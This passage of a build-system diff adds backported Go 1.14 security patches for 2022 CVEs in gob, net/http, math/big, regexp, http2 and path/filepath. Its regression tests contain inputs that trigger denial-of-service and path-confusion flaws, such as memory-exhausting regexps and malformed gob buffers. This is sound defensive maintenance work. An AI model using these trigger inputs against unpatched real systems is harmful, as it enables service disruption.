+ engine.instr[fieldnum] = decInstr{*op, fieldnum, nil, ovfl}
+ continue
+ }
+diff --git a/src/encoding/gob/gobencdec_test.go b/src/encoding/gob/gobencdec_test.go
+index 6d2c8db..1b52ecc 100644
+--- a/src/encoding/gob/gobencdec_test.go
++++ b/src/encoding/gob/gobencdec_test.go
+@@ -12,6 +12,7 @@ import (
+ "fmt"
+ "io"
+ "net"
++ "reflect"
+ "strings"
+ "testing"
+ "time"
+@@ -796,3 +797,26 @@ func TestNetIP(t *testing.T) {
+ t.Errorf("decoded to %v, want 1.2.3.4", ip.String())
+ }
+ }
++
++func TestIngoreDepthLimit(t *testing.T) {
++ // We don't test the actual depth limit because it requires building an
++ // extremely large message, which takes quite a while.
++ oldNestingDepth := maxIgnoreNestingDepth
++ maxIgnoreNestingDepth = 100
++ defer func() { maxIgnoreNestingDepth = oldNestingDepth }()
++ b := new(bytes.Buffer)
++ enc := NewEncoder(b)
++ typ := reflect.TypeOf(int(0))
++ nested := reflect.ArrayOf(1, typ)
++ for i := 0; i < 100; i++ {
++ nested = reflect.ArrayOf(1, nested)
++ }
++ badStruct := reflect.New(reflect.StructOf([]reflect.StructField{{Name: "F", Type: nested}}))
++ enc.Encode(badStruct.Interface())
++ dec := NewDecoder(b)
++ var output struct{ Hello int }
++ expectedErr := "invalid nesting depth"
++ if err := dec.Decode(&output); err == nil || err.Error() != expectedErr {
++ t.Errorf("Decode didn't fail with depth limit of 100: want %q, got %q", expectedErr, err)
++ }
++}
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch
new file mode 100644
index 0000000000..aab98e99fd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch
@@ -0,0 +1,49 @@
+From 0fe3adec199e8cd2c101933f75d8cd617de70350 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 26 Aug 2022 12:48:13 +0530
+Subject: [PATCH] CVE-2022-32148
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ed2f33e1a7e0d18f61bd56f7ee067331d612c27e]
+CVE: CVE-2022-32148
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/net/http/header.go | 6 ++++++
+ src/net/http/header_test.go | 5 +++++
+ 2 files changed, 11 insertions(+)
+
+diff --git a/src/net/http/header.go b/src/net/http/header.go
+index b9b5391..221f613 100644
+--- a/src/net/http/header.go
++++ b/src/net/http/header.go
+@@ -100,6 +100,12 @@ func (h Header) Clone() Header {
+ sv := make([]string, nv) // shared backing array for headers' values
+ h2 := make(Header, len(h))
+ for k, vv := range h {
++ if vv == nil {
++ // Preserve nil values. ReverseProxy distinguishes
++ // between nil and zero-length header values.
++ h2[k] = nil
++ continue
++ }
+ n := copy(sv, vv)
+ h2[k] = sv[:n:n]
+ sv = sv[n:]
+diff --git a/src/net/http/header_test.go b/src/net/http/header_test.go
+index 4789362..80c0035 100644
+--- a/src/net/http/header_test.go
++++ b/src/net/http/header_test.go
+@@ -235,6 +235,11 @@ func TestCloneOrMakeHeader(t *testing.T) {
+ in: Header{"foo": {"bar"}},
+ want: Header{"foo": {"bar"}},
+ },
++ {
++ name: "nil value",
++ in: Header{"foo": nil},
++ want: Header{"foo": nil},
++ },
+ }
+
+ for _, tt := range tests {
+--
+2.25.1
+
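For context, a minimal sketch (separate from the patch itself) of why preserving nil matters: ReverseProxy treats a nil X-Forwarded-For value as "do not attach this header", and before the fix Clone turned that nil into an empty, non-nil slice, losing the marker.

package main

import (
	"fmt"
	"net/http"
)

func main() {
	h := http.Header{
		"Accept":          {"text/html"},
		"X-Forwarded-For": nil, // "do not attach a forwarding header"
	}
	c := h.Clone()
	// With the patch, the nil marker survives the clone.
	fmt.Println(c["X-Forwarded-For"] == nil)
}
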
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch
new file mode 100644
index 0000000000..15fda7de1b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch
@@ -0,0 +1,113 @@
+From 027e7e1578d3d7614f7586eff3894b83d9709e14 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 29 Aug 2022 10:08:34 +0530
+Subject: [PATCH] CVE-2022-32189
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/703c8ab7e5ba75c95553d4e249309297abad7102]
+CVE: CVE-2022-32189
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/math/big/floatmarsh.go | 7 +++++++
+ src/math/big/floatmarsh_test.go | 12 ++++++++++++
+ src/math/big/ratmarsh.go | 6 ++++++
+ src/math/big/ratmarsh_test.go | 12 ++++++++++++
+ 4 files changed, 37 insertions(+)
+
+diff --git a/src/math/big/floatmarsh.go b/src/math/big/floatmarsh.go
+index d1c1dab..990e085 100644
+--- a/src/math/big/floatmarsh.go
++++ b/src/math/big/floatmarsh.go
+@@ -8,6 +8,7 @@ package big
+
+ import (
+ "encoding/binary"
++ "errors"
+ "fmt"
+ )
+
+@@ -67,6 +68,9 @@ func (z *Float) GobDecode(buf []byte) error {
+ *z = Float{}
+ return nil
+ }
++ if len(buf) < 6 {
++ return errors.New("Float.GobDecode: buffer too small")
++ }
+
+ if buf[0] != floatGobVersion {
+ return fmt.Errorf("Float.GobDecode: encoding version %d not supported", buf[0])
+@@ -83,6 +87,9 @@ func (z *Float) GobDecode(buf []byte) error {
+ z.prec = binary.BigEndian.Uint32(buf[2:])
+
+ if z.form == finite {
++ if len(buf) < 10 {
++ return errors.New("Float.GobDecode: buffer too small for finite form float")
++ }
+ z.exp = int32(binary.BigEndian.Uint32(buf[6:]))
+ z.mant = z.mant.setBytes(buf[10:])
+ }
+diff --git a/src/math/big/floatmarsh_test.go b/src/math/big/floatmarsh_test.go
+index c056d78..401f45a 100644
+--- a/src/math/big/floatmarsh_test.go
++++ b/src/math/big/floatmarsh_test.go
+@@ -137,3 +137,15 @@ func TestFloatJSONEncoding(t *testing.T) {
+ }
+ }
+ }
++
++func TestFloatGobDecodeShortBuffer(t *testing.T) {
++ for _, tc := range [][]byte{
++ []byte{0x1, 0x0, 0x0, 0x0},
++ []byte{0x1, 0xfa, 0x0, 0x0, 0x0, 0x0},
++ } {
++ err := NewFloat(0).GobDecode(tc)
++ if err == nil {
++ t.Error("expected GobDecode to return error for malformed input")
++ }
++ }
++}
+diff --git a/src/math/big/ratmarsh.go b/src/math/big/ratmarsh.go
+index fbc7b60..56102e8 100644
+--- a/src/math/big/ratmarsh.go
++++ b/src/math/big/ratmarsh.go
+@@ -45,12 +45,18 @@ func (z *Rat) GobDecode(buf []byte) error {
+ *z = Rat{}
+ return nil
+ }
++ if len(buf) < 5 {
++ return errors.New("Rat.GobDecode: buffer too small")
++ }
+ b := buf[0]
+ if b>>1 != ratGobVersion {
+ return fmt.Errorf("Rat.GobDecode: encoding version %d not supported", b>>1)
+ }
+ const j = 1 + 4
+ i := j + binary.BigEndian.Uint32(buf[j-4:j])
++ if len(buf) < int(i) {
++ return errors.New("Rat.GobDecode: buffer too small")
++ }
+ z.a.neg = b&1 != 0
+ z.a.abs = z.a.abs.setBytes(buf[j:i])
+ z.b.abs = z.b.abs.setBytes(buf[i:])
+diff --git a/src/math/big/ratmarsh_test.go b/src/math/big/ratmarsh_test.go
+index 351d109..55a9878 100644
+--- a/src/math/big/ratmarsh_test.go
++++ b/src/math/big/ratmarsh_test.go
+@@ -123,3 +123,15 @@ func TestRatXMLEncoding(t *testing.T) {
+ }
+ }
+ }
++
++func TestRatGobDecodeShortBuffer(t *testing.T) {
++ for _, tc := range [][]byte{
++ []byte{0x2},
++ []byte{0x2, 0x0, 0x0, 0x0, 0xff},
++ } {
++ err := NewRat(1, 2).GobDecode(tc)
++ if err == nil {
++ t.Error("expected GobDecode to return error for malformed input")
++ }
++ }
++}
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch
new file mode 100644
index 0000000000..fac0ebe94c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch
@@ -0,0 +1,271 @@
+From e9017c2416ad0ef642f5e0c2eab2dbf3cba4d997 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Wed, 28 Sep 2022 11:18:51 -0400
+Subject: [PATCH] [release-branch.go1.18] regexp: limit size of parsed regexps
+
+Set a 128 MB limit on the amount of space used by []syntax.Inst
+in the compiled form corresponding to a given regexp.
+
+Also set a 128 MB limit on the rune storage in the *syntax.Regexp
+tree itself.
+
+Thanks to Adam Korczynski (ADA Logics) and OSS-Fuzz for reporting this issue.
+
+Fixes CVE-2022-41715.
+Updates #55949.
+Fixes #55950.
+
+Change-Id: Ia656baed81564436368cf950e1c5409752f28e1b
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1592136
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/438501
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/e9017c2416ad0ef642f5e0c2eab2dbf3cba4d997]
+CVE: CVE-2022-41715
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ src/regexp/syntax/parse.go | 145 ++++++++++++++++++++++++++++++--
+ src/regexp/syntax/parse_test.go | 13 +--
+ 2 files changed, 148 insertions(+), 10 deletions(-)
+
+diff --git a/src/regexp/syntax/parse.go b/src/regexp/syntax/parse.go
+index 55bd20d..60491d5 100644
+--- a/src/regexp/syntax/parse.go
++++ b/src/regexp/syntax/parse.go
+@@ -90,15 +90,49 @@ const (
+ // until we've allocated at least maxHeight Regexp structures.
+ const maxHeight = 1000
+
++// maxSize is the maximum size of a compiled regexp in Insts.
++// It too is somewhat arbitrarily chosen, but the idea is to be large enough
++// to allow significant regexps while at the same time small enough that
++// the compiled form will not take up too much memory.
++// 128 MB is enough for a 3.3 million Inst structures, which roughly
++// corresponds to a 3.3 MB regexp.
++const (
++ maxSize = 128 << 20 / instSize
++ instSize = 5 * 8 // byte, 2 uint32, slice is 5 64-bit words
++)
++
++// maxRunes is the maximum number of runes allowed in a regexp tree
++// counting the runes in all the nodes.
++// Ignoring character classes p.numRunes is always less than the length of the regexp.
++// Character classes can make it much larger: each \pL adds 1292 runes.
++// 128 MB is enough for 32M runes, which is over 26k \pL instances.
++// Note that repetitions do not make copies of the rune slices,
++// so \pL{1000} is only one rune slice, not 1000.
++// We could keep a cache of character classes we've seen,
++// so that all the \pL we see use the same rune list,
++// but that doesn't remove the problem entirely:
++// consider something like [\pL01234][\pL01235][\pL01236]...[\pL^&*()].
++// And because the Rune slice is exposed directly in the Regexp,
++// there is not an opportunity to change the representation to allow
++// partial sharing between different character classes.
++// So the limit is the best we can do.
++const (
++ maxRunes = 128 << 20 / runeSize
++ runeSize = 4 // rune is int32
++)
++
+ type parser struct {
+ flags Flags // parse mode flags
+ stack []*Regexp // stack of parsed expressions
+ free *Regexp
+ numCap int // number of capturing groups seen
+ wholeRegexp string
+- tmpClass []rune // temporary char class work space
+- numRegexp int // number of regexps allocated
+- height map[*Regexp]int // regexp height for height limit check
++ tmpClass []rune // temporary char class work space
++ numRegexp int // number of regexps allocated
++ numRunes int // number of runes in char classes
++ repeats int64 // product of all repetitions seen
++ height map[*Regexp]int // regexp height, for height limit check
++ size map[*Regexp]int64 // regexp compiled size, for size limit check
+ }
+
+ func (p *parser) newRegexp(op Op) *Regexp {
+@@ -122,6 +156,104 @@ func (p *parser) reuse(re *Regexp) {
+ p.free = re
+ }
+
++func (p *parser) checkLimits(re *Regexp) {
++ if p.numRunes > maxRunes {
++ panic(ErrInternalError)
++ }
++ p.checkSize(re)
++ p.checkHeight(re)
++}
++
++func (p *parser) checkSize(re *Regexp) {
++ if p.size == nil {
++ // We haven't started tracking size yet.
++ // Do a relatively cheap check to see if we need to start.
++ // Maintain the product of all the repeats we've seen
++ // and don't track if the total number of regexp nodes
++ // we've seen times the repeat product is in budget.
++ if p.repeats == 0 {
++ p.repeats = 1
++ }
++ if re.Op == OpRepeat {
++ n := re.Max
++ if n == -1 {
++ n = re.Min
++ }
++ if n <= 0 {
++ n = 1
++ }
++ if int64(n) > maxSize/p.repeats {
++ p.repeats = maxSize
++ } else {
++ p.repeats *= int64(n)
++ }
++ }
++ if int64(p.numRegexp) < maxSize/p.repeats {
++ return
++ }
++
++ // We need to start tracking size.
++ // Make the map and belatedly populate it
++ // with info about everything we've constructed so far.
++ p.size = make(map[*Regexp]int64)
++ for _, re := range p.stack {
++ p.checkSize(re)
++ }
++ }
++
++ if p.calcSize(re, true) > maxSize {
++ panic(ErrInternalError)
++ }
++}
++
++func (p *parser) calcSize(re *Regexp, force bool) int64 {
++ if !force {
++ if size, ok := p.size[re]; ok {
++ return size
++ }
++ }
++
++ var size int64
++ switch re.Op {
++ case OpLiteral:
++ size = int64(len(re.Rune))
++ case OpCapture, OpStar:
++ // star can be 1+ or 2+; assume 2 pessimistically
++ size = 2 + p.calcSize(re.Sub[0], false)
++ case OpPlus, OpQuest:
++ size = 1 + p.calcSize(re.Sub[0], false)
++ case OpConcat:
++ for _, sub := range re.Sub {
++ size += p.calcSize(sub, false)
++ }
++ case OpAlternate:
++ for _, sub := range re.Sub {
++ size += p.calcSize(sub, false)
++ }
++ if len(re.Sub) > 1 {
++ size += int64(len(re.Sub)) - 1
++ }
++ case OpRepeat:
++ sub := p.calcSize(re.Sub[0], false)
++ if re.Max == -1 {
++ if re.Min == 0 {
++ size = 2 + sub // x*
++ } else {
++ size = 1 + int64(re.Min)*sub // xxx+
++ }
++ break
++ }
++ // x{2,5} = xx(x(x(x)?)?)?
++ size = int64(re.Max)*sub + int64(re.Max-re.Min)
++ }
++
++ if size < 1 {
++ size = 1
++ }
++ p.size[re] = size
++ return size
++}
++
+ func (p *parser) checkHeight(re *Regexp) {
+ if p.numRegexp < maxHeight {
+ return
+@@ -158,6 +290,7 @@ func (p *parser) calcHeight(re *Regexp, force bool) int {
+
+ // push pushes the regexp re onto the parse stack and returns the regexp.
+ func (p *parser) push(re *Regexp) *Regexp {
++ p.numRunes += len(re.Rune)
+ if re.Op == OpCharClass && len(re.Rune) == 2 && re.Rune[0] == re.Rune[1] {
+ // Single rune.
+ if p.maybeConcat(re.Rune[0], p.flags&^FoldCase) {
+@@ -189,7 +322,7 @@ func (p *parser) push(re *Regexp) *Regexp {
+ }
+
+ p.stack = append(p.stack, re)
+- p.checkHeight(re)
++ p.checkLimits(re)
+ return re
+ }
+
+@@ -305,7 +438,7 @@ func (p *parser) repeat(op Op, min, max int, before, after, lastRepeat string) (
+ re.Sub = re.Sub0[:1]
+ re.Sub[0] = sub
+ p.stack[n-1] = re
+- p.checkHeight(re)
++ p.checkLimits(re)
+
+ if op == OpRepeat && (min >= 2 || max >= 2) && !repeatIsValid(re, 1000) {
+ return "", &Error{ErrInvalidRepeatSize, before[:len(before)-len(after)]}
+@@ -509,6 +642,7 @@ func (p *parser) factor(sub []*Regexp) []*Regexp {
+
+ for j := start; j < i; j++ {
+ sub[j] = p.removeLeadingString(sub[j], len(str))
++ p.checkLimits(sub[j])
+ }
+ suffix := p.collapse(sub[start:i], OpAlternate) // recurse
+
+@@ -566,6 +700,7 @@ func (p *parser) factor(sub []*Regexp) []*Regexp {
+ for j := start; j < i; j++ {
+ reuse := j != start // prefix came from sub[start]
+ sub[j] = p.removeLeadingRegexp(sub[j], reuse)
++ p.checkLimits(sub[j])
+ }
+ suffix := p.collapse(sub[start:i], OpAlternate) // recurse
+
+diff --git a/src/regexp/syntax/parse_test.go b/src/regexp/syntax/parse_test.go
+index 1ef6d8a..67e3c56 100644
+--- a/src/regexp/syntax/parse_test.go
++++ b/src/regexp/syntax/parse_test.go
+@@ -484,12 +484,15 @@ var invalidRegexps = []string{
+ `(?P<>a)`,
+ `[a-Z]`,
+ `(?i)[a-Z]`,
+- `a{100000}`,
+- `a{100000,}`,
+- "((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})",
+- strings.Repeat("(", 1000) + strings.Repeat(")", 1000),
+- strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000),
+ `\Q\E*`,
++ `a{100000}`, // too much repetition
++ `a{100000,}`, // too much repetition
++ "((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})", // too much repetition
++ strings.Repeat("(", 1000) + strings.Repeat(")", 1000), // too deep
++ strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000), // too deep
++ "(" + strings.Repeat("(xx?)", 1000) + "){1000}", // too long
++ strings.Repeat("(xx?){1000}", 1000), // too long
++ strings.Repeat(`\pL`, 27000), // too many runes
+ }
+
+ var onlyPerl = []string{
+--
+2.25.1
+
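A short caller-level sketch, separate from the patch itself: with the size and rune budgets above, pathological patterns now fail to compile instead of allocating huge parse trees. The repeat counts below mirror the new test cases.

package main

import (
	"fmt"
	"regexp"
	"strings"
)

func main() {
	// Each \pL character class carries roughly 1292 runes, so 27,000 of
	// them exceed the 128 MB rune budget and Compile returns an error.
	if _, err := regexp.Compile(strings.Repeat(`\pL`, 27000)); err != nil {
		fmt.Println("rune budget:", err)
	}
	// Nested repetition that would compile to millions of instructions
	// is rejected by the size check.
	if _, err := regexp.Compile(strings.Repeat("(xx?){1000}", 1000)); err != nil {
		fmt.Println("size budget:", err)
	}
}
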
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch
new file mode 100644
index 0000000000..8bf22ee4d4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch
@@ -0,0 +1,75 @@
+From 618120c165669c00a1606505defea6ca755cdc27 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 30 Nov 2022 16:46:33 -0500
+Subject: [PATCH] [release-branch.go1.19] net/http: update bundled
+ golang.org/x/net/http2
+
+Disable cmd/internal/moddeps test, since this update includes PRIVATE
+track fixes.
+
+For #56350.
+For #57009.
+Fixes CVE-2022-41717.
+
+Change-Id: I5c6ce546add81f361dcf0d5123fa4eaaf8f0a03b
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1663835
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/455363
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Jenny Rakoczy <jenny@golang.org>
+Reviewed-by: Michael Pratt <mpratt@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27]
+CVE: CVE-2022-41717
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/net/http/h2_bundle.go | 18 +++++++++++-------
+ 1 file changed, 11 insertions(+), 7 deletions(-)
+
+diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
+index 83f2a72..cc03a62 100644
+--- a/src/net/http/h2_bundle.go
++++ b/src/net/http/h2_bundle.go
+@@ -4096,6 +4096,7 @@ type http2serverConn struct {
+ headerTableSize uint32
+ peerMaxHeaderListSize uint32 // zero means unknown (default)
+ canonHeader map[string]string // http2-lower-case -> Go-Canonical-Case
++ canonHeaderKeysSize int // canonHeader keys size in bytes
+ writingFrame bool // started writing a frame (on serve goroutine or separate)
+ writingFrameAsync bool // started a frame on its own goroutine but haven't heard back on wroteFrameCh
+ needsFrameFlush bool // last frame write wasn't a flush
+@@ -4278,6 +4279,13 @@ func (sc *http2serverConn) condlogf(err error, format string, args ...interface{
+ }
+ }
+
++// maxCachedCanonicalHeadersKeysSize is an arbitrarily-chosen limit on the size
++// of the entries in the canonHeader cache.
++// This should be larger than the size of unique, uncommon header keys likely to
++// be sent by the peer, while not so high as to permit unreasonable memory usage
++// if the peer sends an unbounded number of unique header keys.
++const http2maxCachedCanonicalHeadersKeysSize = 2048
++
+ func (sc *http2serverConn) canonicalHeader(v string) string {
+ sc.serveG.check()
+ http2buildCommonHeaderMapsOnce()
+@@ -4293,14 +4301,10 @@ func (sc *http2serverConn) canonicalHeader(v string) string {
+ sc.canonHeader = make(map[string]string)
+ }
+ cv = CanonicalHeaderKey(v)
+- // maxCachedCanonicalHeaders is an arbitrarily-chosen limit on the number of
+- // entries in the canonHeader cache. This should be larger than the number
+- // of unique, uncommon header keys likely to be sent by the peer, while not
+- // so high as to permit unreaasonable memory usage if the peer sends an unbounded
+- // number of unique header keys.
+- const maxCachedCanonicalHeaders = 32
+- if len(sc.canonHeader) < maxCachedCanonicalHeaders {
++ size := 100 + len(v)*2 // 100 bytes of map overhead + key + value
++ if sc.canonHeaderKeysSize+size <= http2maxCachedCanonicalHeadersKeysSize {
+ sc.canonHeader[v] = cv
++ sc.canonHeaderKeysSize += size
+ }
+ return cv
+ }
+--
+2.30.2
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch
new file mode 100644
index 0000000000..f5bffd7a0b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch
@@ -0,0 +1,53 @@
+From 94e0c36694fb044e81381d112fef3692de7cdf52 Mon Sep 17 00:00:00 2001
+From: Yasuhiro Matsumoto <mattn.jp@gmail.com>
+Date: Fri, 22 Apr 2022 10:07:51 +0900
+Subject: [PATCH 1/2] path/filepath: do not remove prefix "." when following
+ path contains ":".
+
+Fixes #52476
+
+Change-Id: I9eb72ac7dbccd6322d060291f31831dc389eb9bb
+Reviewed-on: https://go-review.googlesource.com/c/go/+/401595
+Auto-Submit: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Alex Brainman <alex.brainman@gmail.com>
+Run-TryBot: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/9cd1818a7d019c02fa4898b3e45a323e35033290]
+CVE: CVE-2022-41722
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/path/filepath/path.go | 14 +++++++++++++-
+ 1 file changed, 13 insertions(+), 1 deletion(-)
+
+diff --git a/src/path/filepath/path.go b/src/path/filepath/path.go
+index 26f1833..92dc090 100644
+--- a/src/path/filepath/path.go
++++ b/src/path/filepath/path.go
+@@ -116,9 +116,21 @@ func Clean(path string) string {
+ case os.IsPathSeparator(path[r]):
+ // empty path element
+ r++
+- case path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):
++ case path[r] == '.' && r+1 == n:
+ // . element
+ r++
++ case path[r] == '.' && os.IsPathSeparator(path[r+1]):
++ // ./ element
++ r++
++
++ for r < len(path) && os.IsPathSeparator(path[r]) {
++ r++
++ }
++ if out.w == 0 && volumeNameLen(path[r:]) > 0 {
++ // When joining prefix "." and an absolute path on Windows,
++ // the prefix should not be removed.
++ out.append('.')
++ }
+ case path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):
+ // .. element: remove to last separator
+ r += 2
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch
new file mode 100644
index 0000000000..e1f7a55581
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch
@@ -0,0 +1,104 @@
+From b8803cb711ae163b8e67897deb6cf8c49702227c Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Mon, 12 Dec 2022 16:43:37 -0800
+Subject: [PATCH 2/2] path/filepath: do not Clean("a/../c:/b") into c:\b on
+ Windows
+
+Do not permit Clean to convert a relative path into one starting
+with a drive reference. This change causes Clean to insert a .
+path element at the start of a path when the original path does not
+start with a volume name, and the first path element would contain
+a colon.
+
+This may introduce a spurious but harmless . path element under
+some circumstances. For example, Clean("a/../b:/../c") becomes `.\c`.
+
+This reverts CL 401595, since the change here supersedes the one
+in that CL.
+
+Thanks to RyotaK (https://twitter.com/ryotkak) for reporting this issue.
+
+Updates #57274
+Fixes #57276
+Fixes CVE-2022-41722
+
+Change-Id: I837446285a03aa74c79d7642720e01f354c2ca17
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1675249
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+(cherry picked from commit 8ca37f4813ef2f64600c92b83f17c9f3ca6c03a5)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728944
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/468119
+Reviewed-by: Than McIntosh <thanm@google.com>
+Run-TryBot: Michael Pratt <mpratt@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Auto-Submit: Michael Pratt <mpratt@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bdf07c2e168baf736e4c057279ca12a4d674f18c]
+CVE: CVE-2022-41722
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/path/filepath/path.go | 27 ++++++++++++++-------------
+ 1 file changed, 14 insertions(+), 13 deletions(-)
+
+diff --git a/src/path/filepath/path.go b/src/path/filepath/path.go
+index 92dc090..f0f095e 100644
+--- a/src/path/filepath/path.go
++++ b/src/path/filepath/path.go
+@@ -14,6 +14,7 @@ package filepath
+ import (
+ "errors"
+ "os"
++ "runtime"
+ "sort"
+ "strings"
+ )
+@@ -116,21 +117,9 @@ func Clean(path string) string {
+ case os.IsPathSeparator(path[r]):
+ // empty path element
+ r++
+- case path[r] == '.' && r+1 == n:
++ case path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):
+ // . element
+ r++
+- case path[r] == '.' && os.IsPathSeparator(path[r+1]):
+- // ./ element
+- r++
+-
+- for r < len(path) && os.IsPathSeparator(path[r]) {
+- r++
+- }
+- if out.w == 0 && volumeNameLen(path[r:]) > 0 {
+- // When joining prefix "." and an absolute path on Windows,
+- // the prefix should not be removed.
+- out.append('.')
+- }
+ case path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):
+ // .. element: remove to last separator
+ r += 2
+@@ -156,6 +145,18 @@ func Clean(path string) string {
+ if rooted && out.w != 1 || !rooted && out.w != 0 {
+ out.append(Separator)
+ }
++ // If a ':' appears in the path element at the start of a Windows path,
++ // insert a .\ at the beginning to avoid converting relative paths
++ // like a/../c: into c:.
++ if runtime.GOOS == "windows" && out.w == 0 && out.volLen == 0 && r != 0 {
++ for i := r; i < n && !os.IsPathSeparator(path[i]); i++ {
++ if path[i] == ':' {
++ out.append('.')
++ out.append(Separator)
++ break
++ }
++ }
++ }
+ // copy element
+ for ; r < n && !os.IsPathSeparator(path[r]); r++ {
+ out.append(path[r])
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch
new file mode 100644
index 0000000000..a93fa31dcd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch
@@ -0,0 +1,156 @@
+From 451766789f646617157c725e20c955d4a9a70d4e Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Mon, 6 Feb 2023 10:03:44 -0800
+Subject: [PATCH] net/http: update bundled golang.org/x/net/http2
+
+Disable cmd/internal/moddeps test, since this update includes PRIVATE
+track fixes.
+
+Fixes CVE-2022-41723
+Fixes #58355
+Updates #57855
+
+Change-Id: Ie870562a6f6e44e4e8f57db6a0dde1a41a2b090c
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728939
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/468118
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Pratt <mpratt@google.com>
+Auto-Submit: Michael Pratt <mpratt@google.com>
+Reviewed-by: Than McIntosh <thanm@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5c3e11bd0b5c0a86e5beffcd4339b86a902b21c3]
+CVE: CVE-2022-41723
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/vendor/golang.org/x/net/http2/hpack/hpack.go | 79 +++++++++++++++---------
